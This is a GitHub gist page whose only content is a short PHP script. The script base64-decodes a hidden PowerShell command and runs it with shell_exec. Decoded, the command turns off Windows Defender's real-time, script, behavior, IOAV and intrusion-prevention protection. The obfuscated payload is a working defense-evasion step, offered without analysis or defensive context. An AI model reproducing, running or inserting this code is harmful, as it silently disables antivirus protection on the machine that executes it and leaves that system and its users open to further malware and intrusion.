Skip to content

Instantly share code, notes, and snippets.

@grittyninja
Last active August 30, 2024 13:34
Show Gist options
  • Save grittyninja/9e87e0041a5c2f840b7f3b810c94176b to your computer and use it in GitHub Desktop.
Save grittyninja/9e87e0041a5c2f840b7f3b810c94176b to your computer and use it in GitHub Desktop.
<?php
$base64 = 'cG93ZXJzaGVsbCAtY29tbWFuZCAnU2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nICR0cnVlIC1EaXNhYmxlSU9BVlByb3RlY3Rpb24gJHRydWUgLURpc2FibGVJbnRydXNpb25QcmV2ZW50aW9uU3lzdGVtICR0cnVlJw==';
shell_exec(base64_decode($base64));
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment